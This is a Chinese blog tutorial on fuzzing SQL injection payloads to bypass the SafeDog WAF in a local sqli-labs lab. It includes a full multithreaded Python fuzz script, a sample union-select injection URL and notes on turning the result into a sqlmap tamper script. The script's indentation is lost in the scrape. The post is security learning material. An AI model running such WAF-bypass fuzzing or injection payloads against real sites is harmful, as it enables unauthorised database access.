sqlmap tamper脚本_Fuzz脚本的编写

最新推荐文章于 2024-04-28 20:30:00 发布
最新推荐文章于 2024-04-28 20:30:00 发布
阅读量212 收藏
点赞数
文章标签: sqlmap tamper脚本

7a2e7cf8d793a8634cf4b64bdc6ad396.png

原创: Naivete 合天智汇

目录1.mysqlsql注入
2.环境搭建
3.fuzz脚本编写
4.嵌入到sqlmap的tamper脚本
能力有限,仅以sql注入为例子(其中以某学长的提醒,某行嘉宾前辈的课程和讲解为基础,以网上前辈各大博客为拓展写出此文)
5.总结1. mysql sql注入略。2. 环境搭建这里详细说下,坑有些,浪费时间性价比不高1某狗下载http://free.safedog.cn/website_safedog.html某狗的下载(注意是apache4.0版本),作者这里如果下的服务器版本再在里面下apache软件出错2phpstudy2016下载http://mydown.yesky.com/pcsoft/467336.html3安装第一,二步,要系统服务某狗才能识别网站
第三步,去github上下个sqli-labs当靶机源码

131ad018f5ea68528d3585430ca8fab1.png


第一步,把ip黑名单关了
第二步,把各种资源防护关了,只留http防护

21a5c77dcd1e2f2012a6d8ff1a75a01e.png

b75e6e0d7c60e6fc0492017374534cea.png

4f417c5517818c304d1ae47a6c334ddd.png

4简单验证环境

  1. url?id= 1’ and 1=1 --+ 触发 某狗的and语句条件预警,被拦截

28cf96176e5d990830a7a54887fb7790.png


2. 我们看下能不能用requests进行访问请求,看返回包里存在”网站防火墙字样”说明是成功的(这是我们进行判断语句是否绕过waf的基础)
提醒一下,可能是因为访问请求过大,作者中途发现requests请求不到内容,重启虚拟机就好了,所以专门提出来

a055f32b6e25d478952599e17a3d66a4.png

d12c11e2d2a83610c4ef3977a397b55d.png

4. fuzz脚本编写1如何编写这里,利用网上的流传甚广的内联(作者也只会这个)
fuzz出,意思就是绕过正则匹配
这里作者只进行两个语句的fuzz
其中url="http://192.168.37.132/sqli-labs-master/Less-1/?id=1"

40e5c8165da62f2c94f1ecae3c4a0ec6.png


当然还有bool 时间 等等注入的fuzz,字典字符的顺序和字符在语句中位置很重要,很重要,很重要(重要事情说三遍)2附上脚本# -*- coding:UTF-8 -*-
import requests
import time
from concurrent.futures import ThreadPoolExecutor,ProcessPoolExecutor
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
MAX_JOBS_IN_QUEUE = 1000
def request_url(url):
s=requests.get(url).text
if "网站防火墙" not in s:
#print "no:"+url
if "Your Login name" in s:
print url
with open("a.txt","a+") as f:
f.write(url)
f.write("n")
f.close()
fuzz_zs = ['/*','*/','/*!','?','/**/','/','*','!','%','%a0']
fuzz_sz = ['0','6','7','8','9']
fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g"]
Fuzz = fuzz_ch + fuzz_zs
#Fuzz=list(set(Fuzz))
print Fuzz
print "start:"
start_time=time.time()
url="http://192.168.37.132/sqli-labs-master/Less-1/?id=1"
num=0
length=len(Fuzz)**5
with ThreadPoolExecutor(20) as executor:
for a in Fuzz:
for b in Fuzz:
for c in Fuzz:
for d in Fuzz:
for e in Fuzz:
if num % 200000 == 0 and num > 10000:
end_time = time.time()
seconds = end_time - start_time
m, s = divmod(seconds, 60)
h, m = divmod(m, 60)
print ("%s:%s:%s" % (h, m, s))
# time.sleep(15)
try:
num = num + 1
exp = url + "' /*!union" + a + b + c + d + e+"select*/" + " 1,2,3 --+"
#exp = url + "' union/*!" + a + b + c + d + e"*/ select" + " 1,2,3 --+"
sys.stdout.write(' ' * 30 + 'r')
sys.stdout.flush()
sys.stdout.write("%s/%s r" % (num, length))
sys.stdout.flush()
executor.submit(request_url, exp)
del exp
except Exception as e:
pass
'''http://192.168.37.132/sqli-labs-master/Less-1/?id=-1%27union/*!90000aaa*/select%201,2,3/*!90000aaa*//*!90000aaa*/from%20information_schema.tables/*!90000aaa*/%23
fuzz_zs = ['/*','*/','/*!','?','*','=','`','~','!','@','%','.','-','+','|','%00','%20' ,'%09', '%0a', '%0b', '%0c', '%0d' , '%a0' ,'/**/']
fuzz_sz = ['0','1','2','3','4','5','6','7','8','9']
fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j","%0k","%0l","%0m","%0n", "%0o","%0p","%0q","%0r","%0s","%0t","%0u","%0v","%0w","%0x","%0y","%0z"]
fuzz_zs = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00','/*','*/','/*!','?','*','=','`','~','!','@','%','.','-','+','|','%00','%20' ,'%09', '%0a', '%0b', '%0c', '%0d' , '%a0' ,'/**/']
fuzz_sz = ['', ' ','0','1','2','3','4','5','6','7','8','9']
fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j","%0k","%0l","%0m","%0n", "%0o","%0p","%0q","%0r","%0s","%0t","%0u","%0v","%0w","%0x","%0y","%0z"]
'''3优化脚本还是提出来,供大家学习学习
无外乎是多线程跑起来,但是怎样利用多线程,这里作者前前后后用了多种(不限于这个脚本,是作者学习python语言道路上遇到的)
1)threadpool 老式的,效果还可以
2)multiprocessing和multithreading
3)自己的线程池类
垃圾效果。。。
4)concurrent.futures
也就是本代码用到的
参考:https://www.cnblogs.com/zhang293/p/7954353.html 4效果结果这里下图可以清楚看到,我们进行Fuzz的字符集合,时间原因作者设置的字符个数比较少,毕竟是进行阶乘,字符每增加一个,都懂得
以及三排时间,作者是每跑完20w,就打印一遍时间,可以看到,时间还是耗费还是比较少的,1分钟就跑完20w了

592325316b307b4b9016efbf1b6108a3.png

697836c5cc559189a514389d075d5574.png

a4e925fd1416c0af43e9cfcd46d79241.png

caf8d488610dce3614be041946853266.png


你没有看错,142w,跑完这些集合没有一个能行5这里说几处改点如果要修改,注意这几处
1)作者测试67 8 9绕过概率要大,玄学

6b9854854a3c526b0ee876f79f8a1e56.png


2)for循环的次数和语句位置,更重要的是图中那个ThreadPoolExecutor(20),作者开了虚拟机和杂七杂八的东西,本身电脑8g内存,开了20,刚好合适(运气吧,写这篇文章,刚好代码完全跑过,开大了只跑到90w就内存报错了,也有好处,开到ThreadPoolExecutor(100),4分钟就跑到90w了),自己结合实际情况考虑

07bde263e47e3afefe53a1ddf7731b47.png


3)语句的修改很看技术和修为的,作者也是小白,在探讨

af7ae7b95836a9f44b8ab549e8597231.png


4)判断条件
能行的判断条件,作者有点怀疑自己哪个语句或者条件错了

743b34080f759ab7d63acb71fb09635c.png

4. 嵌入到sqlmap的tamper脚本sqlmap神器已经写好了各种条件,添加tamper脚本,只需简单写个替换条件就行了
可参考:https://blog.csdn.net/whatday/article/details/62059263
tamper有三个部分

d5ea060ff4b6d0968c6523408dd55f61.png


第一部分:
执行脚本的优先级
第二部分
版本,或者是适用条件
第三部分
我们关注的点,作者看了下,简单点就行替换,把unionselect替换成什么就行了

213fa0b822a75cba436a67d33d8b70b8.png


只需改动这,其余部分相当于是公共部分
无成果,有兴趣可以自己研究下5. 总结本身fuzz其实不难(难在语句的构造和位置,这是技术问题了),剩下的就剩暴力破解问题了
作者花费时间最多的是在环境搭建和脚本的运行,这两个点上,文中作者以自己遇到的坑点已经提出来了荐Fuzz实践及Module编写

1ff91c48707c70724ee22eedbde79897.png

实验简介:
通过该实验一方面了解fuzz的思想,并且学会使用metasploit进行fuzz.另外一方面学会根据自己的需求进行module的编写及利用。实验地址:点击阅读原文

weixin_39960319
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap 注入字典_Fuzz绕过安全狗4.0实现SQL注入
weixin_42345731的博客
01-01 738
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入绕waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysq...
1、Sqlmap Tamper脚本编写介绍-01
09-15
Sqlmap Tamper脚本编写介绍 Sqlmap Tamper脚本是对Sqlmap工具的扩展,主要功能是对原本的payload进行特定的更改以绕过WAF。Tamper脚本结构主要包括三个部分:Tamper脚本结构介绍、Tamper函数介绍和dependencies函数...
sqlmap之绕过安全狗
qq_50854662的博客
01-05 6045
sqlmap之绕过安全狗
SQL 取空格右边的字符_分享:SQL 注入常规 Fuzz 全记录
weixin_39707597的博客
11-20 162
前言本文是在做ctf bugku的一道sql 盲注的题中运用了fuzz的思路,完整记录整个fuzz的过程,给师傅们当点心,方便大家加深对web sql注入 fuzz的理解。进入主题1、访问题目,是个典型的登录框2、尝试输入admin/123456,提示密码错误,因此可以确定存在用户admin,这里可能会有师傅要爆破了,但这里题目要求sql注入,我们就按照预期解来吧。3、我自己写了个简单的fuzz ...
网络安全 SQLmap-tamper的使用
最新发布
白帽子凯哥哥的博客
04-28 1357
SQLmap是一款强大的自动化SQL注入和数据库取证工具。它用于检测和利用SQL注入漏洞,帮助安全研究人员测试一个应用的数据库的安全性。
sqlmaptamper脚本编写
good good study
07-26 8781
目录 前言 tamper脚本实战 前言 sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf。 为了说明tamper的结构,让我们从一个最简单的例子开始 # sqlmap/tamper/escapequotes.py from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies():
SQLMapTamper脚本
m0_62207482的博客
01-31 2958
SQLMap是一款用来检测与利用SQL注入漏洞的免费 开源工具,不仅可以实现SQL注入漏洞的检测与利用的自动化处理,而且其自带 的Tamper脚本可以帮助我们绕过IDS/WAF的检测。虽然SQLMap提供了这么多的Tamper脚本,但是在实际使用的过程中,网站 的安全防护并没有那么简单,可能过滤了许多敏感的字符以及相关的函数。这个 时候就需要我们针对目标的防护体系手动构建相应的Tamper脚本Tamper脚本的构建非常简单,其实渗透测试中真正的难点在于如何针对目标 网站的防护找出对应的绕过方法。
3 、Sqlmap Tamper脚本分析(MSSQL)-01
09-15
Sqlmap Tamper脚本分析(MSSQL) Sqlmap Tamper脚本是一种特殊的脚本,用于绕过Web应用程序的防火墙和入侵检测系统,以便进行SQL injection攻击。Tamper脚本可以对payload进行修改,使其能够绕过安全防护机制。下面...
sqlmap-tamper脚本分类
09-22
web渗透,sqlmap脚本分类。渗透
sqlmap绕过过滤的 tamper 脚本分类汇总
03-17
sqlmap绕过过滤的 tamper 脚本分类汇总 sqlmap
SQLMAP --TAMPER编写
m0_64180167的博客
11-17 322
这里的tamper 其实就是多个绕过waf的插件 通过编写tamper 我们可以学会。增加过滤 将这些替换为空 这里其实我们本身已经知道如何注入了 双写绕过即可。就是很简单的对payload进行操作 将所有过滤的内容实现绕过即可。这是最简单的 tamper 后续写就要按照题目来了。我们首先了解一下 tamper的结构。但是我们如何在tamper中体现呢。我们首先进行正常注入看看是否成功。这里学习一下tamper编写。这里我们首先看一个最简单的例子。所以我们开始修改tamper。这里的例子我们可以发现。
sqlmap-tamper说明大全
10-03
本文档主要说明sqlmaptamper使用情况以及主要使用方法,很全的说明文档。
Sqlmap Tamper编写
qq_41741127的博客
10-06 1860
Sqlmap Tamper编写 Sqlmap Tampersqlmap可以调用的脚本,已进行对payload的修改,如:双写、替换空格、编码等。 sqlmap可以使用--tamper调用,编写使用Python。 from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies(): pass def tamper(payload, **kwargs): return payload
Sqlmap Tamper 编写/改写 学习
Goodric的博客
04-26 1811
sqlmap的--tamper参数可以引入用户自定义的脚本修改注入时的payload ,达到sql注入时对一些敏感字符的一些绕过
渗透测试-sqlmap绕过WAF脚本编写
lza20001103的博客
04-21 4435
渗透测试-sqlmap绕过WAF脚本编写
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本
热门推荐
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
【sql注入-WAF绕过】编写sqlmaptamper进行sql注入
06-29 6079
【特征】特殊符号+十六进制格式
从SQL注入绕过最新安全狗WAF中学习fuzz
quan9i的博客
06-11 994
声明:文章首发于先知社区
sqlmap tamper
07-28
用户也可以根据已有的tamper脚本编写自己的tamper脚本,以实现绕过特定的逻辑。\[3\]在使用SQLMAP时,可以通过指定--tamper参数来选择要使用的tamper脚本。例如,可以使用--tamper=xxx.py来调用名为xxx.py的tamper...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值